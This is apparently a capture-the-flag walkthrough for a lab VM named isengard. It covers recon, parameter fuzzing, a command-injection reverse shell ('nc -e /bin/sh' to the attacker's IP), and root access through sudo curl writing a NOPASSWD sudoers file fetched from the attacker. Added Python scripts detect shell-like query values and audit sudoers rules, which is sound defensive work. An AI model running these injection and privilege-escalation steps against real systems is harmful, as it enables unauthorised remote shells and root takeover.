Find the target
└─$ sudo netdiscover -r 10.0.0.0/24 -P 255 ⨯
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:1f:ab:fd 1 60 PCS Systemtechnik GmbH
10.0.0.34 08:00:27:12:4f:50 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan with nmap
# Nmap 7.91 scan initiated Fri Nov 12 06:26:10 2021 as: nmap -v -T4 -p- -sC -sV -oN nmap.out 10.0.0.34
Nmap scan report for 10.0.0.34
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Gray wizard
Port 80 is the only open port.
Gobuster found nothing else hidden...
Manually looking at the HTML & CSS gives a hint.
CSS file:
/* To do:
Add tengwar annatar font from fontmeme*/
Downloading the font and using GIMP to match the text to the image gives a directory path...
That seems to be a folder name that would have taken days to brute force!
(See footer Note 1)
Running gobuster on it reveals:
/index.html (Status: 200) [Size: 250]
/2.jpg (Status: 200) [Size: 63526]
/3.jpg (Status: 200) [Size: 136974]
/east
I did notice the path afterwards... but playing with fonts was fun.
So, as the webpage suggests, let's look at /east
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.34/y0ush4lln0t###/east
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,txt,jpg
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/12 10:23:01 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 285]
/mellon.php (Status: 200) [Size: 0]
===============================================================
2021/11/12 10:27:39 Finished
===============================================================
OK, finally a target: a PHP file that appears empty.
Guessing it will either include a file or execute a command.
After a couple of tries:
└─$ wfuzz -c -z file,/usr/share/wordlists/rockyou.txt --hh BBB http://10.0.0.34/y0ush4lln0t####/east/mellon.php?FUZZ{test}=ls 130 ⨯
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.0.34/y0ush4lln0t####/east/mellon.php?FUZZ=ls
Total requests: 14344391
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 0 L 0 W 0 Ch "test"
000014579: 200 6 L 6 W 77 Ch "frodo"
From Kali, open a browser to:
http://10.0.0.34/y0ush4lln0t####/east/mellon.php?frodo=nc -e /bin/sh 10.0.0.10 1234
After setting up a listener:
┌──(kali㉿kali)-[~/isengard]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.34] 40734
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
(mellon.php is writable by all users so could be replaced or edited to get a better shell.)
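The wfuzz run and the command handed to mellon.php above both leave a distinctive trace in the web server's access log: one source cycling through many different parameter names against a single script, followed by a query value that is a shell command. The script below is an added example (not code from the write-up) of detection logic for both patterns, run over constructed Apache combined-format log lines; the hidden directory name, IPs and user agents in the sample are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache "combined" log lines. The hidden directory (/hidden) is a
# placeholder, not the one from the write-up.
SAMPLE_LOG = """\
10.0.0.10 - - [12/Nov/2021:10:30:01 +0000] "GET /hidden/east/mellon.php?test=ls HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
10.0.0.10 - - [12/Nov/2021:10:30:01 +0000] "GET /hidden/east/mellon.php?admin=ls HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
10.0.0.10 - - [12/Nov/2021:10:30:02 +0000] "GET /hidden/east/mellon.php?cmd=ls HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
10.0.0.10 - - [12/Nov/2021:10:30:02 +0000] "GET /hidden/east/mellon.php?frodo=ls HTTP/1.1" 200 77 "-" "Wfuzz/3.1.0"
10.0.0.10 - - [12/Nov/2021:10:31:15 +0000] "GET /hidden/east/mellon.php?frodo=nc%20-e%20/bin/sh%2010.0.0.10%201234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.22 - - [12/Nov/2021:10:32:00 +0000] "GET /index.html HTTP/1.1" 200 250 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Tokens that almost never belong in a legitimate query value: shell
# metacharacters, common interpreter/network binaries, /bin/ and /dev/tcp paths.
SHELL_TOKENS = re.compile(
    r'(?:^|[\s;|&`$(])(?:nc|ncat|sh|bash|python3?|perl|curl|wget)\b'
    r'|[;|&`]|\$\(|/bin/|/dev/tcp')


def parse_line(line):
    """Return (ip, path, [(param, value), ...]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    params = parse_qsl(url.query, keep_blank_values=True)   # percent-decodes values
    return m.group('ip'), url.path, params


def find_shell_injection(lines):
    """Flag requests whose query values look like shell commands."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, params = parsed
        for name, value in params:
            if SHELL_TOKENS.search(value):
                hits.append((ip, path, name, value))
    return hits


def find_param_fuzzing(lines, threshold=3):
    """Flag (ip, path) pairs probed with at least `threshold` distinct parameter
    names; that churn of names against one script is what a parameter fuzzer looks like."""
    names = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, params = parsed
        for name, _ in params:
            names[(ip, path)].add(name)
    return {key: len(s) for key, s in names.items() if len(s) >= threshold}


if __name__ == '__main__':
    for hit in find_shell_injection(SAMPLE_LOG.splitlines()):
        print('shell-like value:', hit)
    for key, count in find_param_fuzzing(SAMPLE_LOG.splitlines()).items():
        print('parameter fuzzing:', key, count, 'distinct names')
```

The threshold in find_param_fuzzing is a tuning knob: a real fuzzing run produces thousands of distinct names in seconds, so a low value is safe against a script that legitimately accepts only a handful of parameters. The value-based check fires on the final request even though it is a single line with a browser user agent, which is why both checks are worth keeping.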
Escalate to User
Find the zip file in /opt... it's at the end of a folder list somewhere.
Unzip it.
Base64 decode twice.
You have the password for sauron.
su sauron
yXKMw5wpSAr*****
sauron@isengard:/home/sauron$ sudo -l
sudo -l
Matching Defaults entries for sauron on isengard:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curl
Escalate to root
Probably multiple methods to do this, but this was the method I picked:
On Kali I created a text file (check it is correct or it will screw things up!):
└─$ cat sudouser
sauron ALL=(ALL) NOPASSWD: ALL
┌──(kali㉿kali)-[~/isengard]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
sauron@isengard:~$ sudo curl http://10.0.0.10:8000/sudouser
sudo curl http://10.0.0.10:8000/sudouser
[sudo] password for sauron: ***************
sauron ALL=(ALL) NOPASSWD: ALL
Looks OK - send it to /etc/sudoers.d/
sauron@isengard:~$ sudo curl http://10.0.0.10:8000/sudouser -o /etc/sudoers.d/sauron
<10.0.0.10:8000/sudouser -o /etc/sudoers.d/sauron
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 31 100 31 0 0 2384 0 --:--:-- --:--:-- --:--:-- 2384
sauron@isengard:~$ sudo -l
sudo -l
Matching Defaults entries for sauron on isengard:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curl
(ALL) NOPASSWD: ALL
sauron@isengard:~$ sudo su
sudo su
root@isengard:/home/sauron# id
id
uid=0(root) gid=0(root) groups=0(root)
root@isengard:/home/sauron#
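The rule shown by sudo -l (an unrestricted /usr/bin/curl as ALL) and the NOPASSWD: ALL file written into /etc/sudoers.d are exactly the two things a sudoers audit should catch. The script below is an added example, not code from the write-up: it parses sudoers-style user specifications (assumed simplified grammar: no aliases, includes or host lists) and flags any non-root rule that grants ALL, or a file-writing binary with no argument restriction. The sample sudoers text is constructed; its two sauron rules mirror the ones on this page, and the deploy rule is an assumed example of a command pinned to exact arguments.

```python
import re

# Constructed sudoers text. The two "sauron" rules reproduce the ones in the
# write-up (the original /usr/bin/curl entry and the NOPASSWD: ALL file dropped
# into /etc/sudoers.d); "deploy" is an assumed example of a pinned command.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

root    ALL=(ALL:ALL) ALL
sauron  ALL=(ALL) /usr/bin/curl          # the rule listed by sudo -l
sauron  ALL=(ALL) NOPASSWD: ALL          # contents of the dropped-in file
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
"""

# Binaries that, run as root with caller-chosen arguments, can write or read
# arbitrary files (curl -o is the one used above). Assumed short list, not exhaustive.
FILE_WRITERS = {"curl", "wget", "tee", "cp", "mv", "dd"}

# user  host=(runas) [TAG:] cmd [args][, cmd ...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$')


def parse_rules(text):
    """Split sudoers user specifications into one dict per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group('cmds').split(','):
            tokens = spec.split()
            tags = set()
            # Leading upper-case words ending in ':' are tags (NOPASSWD:, SETENV:, ...)
            while tokens and tokens[0].endswith(':') and tokens[0][:-1].isupper():
                tags.add(tokens.pop(0)[:-1])
            if not tokens:
                continue
            rules.append({'who': m.group('who'),
                          'runas': m.group('runas') or 'root',
                          'tags': tags,
                          'cmd': tokens[0],
                          'args': tokens[1:]})
    return rules


def audit_rules(rules):
    """Return (user, command, reason) triples for rules that hand out root."""
    findings = []
    for r in rules:
        if r['who'] == 'root':
            continue
        if r['cmd'] == 'ALL':
            reason = 'every command as ' + r['runas']
            if 'NOPASSWD' in r['tags']:
                reason += ', without a password'
            findings.append((r['who'], 'ALL', reason))
            continue
        base = r['cmd'].rsplit('/', 1)[-1]
        if base in FILE_WRITERS and not r['args']:
            findings.append((r['who'], r['cmd'],
                             'unrestricted arguments: can write any file as ' + r['runas']))
    return findings


if __name__ == '__main__':
    for who, cmd, reason in audit_rules(parse_rules(SAMPLE_SUDOERS)):
        print(f'{who}: {cmd} -> {reason}')
```

Feed it the concatenated contents of /etc/sudoers and /etc/sudoers.d/* on the host being reviewed. The author's warning about getting the file right cuts both ways: visudo -cf on a candidate drop-in checks its syntax before it is installed, and sudo ignores drop-ins that are not root-owned with mode 0440, so a permissions check on /etc/sudoers.d is a cheap addition to this audit.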
Notes:
1. The directory name: you could just read the very bottom of main.css and find the note to exclude it in robots.txt... but who doesn't like to play with pretty pictures every now and then!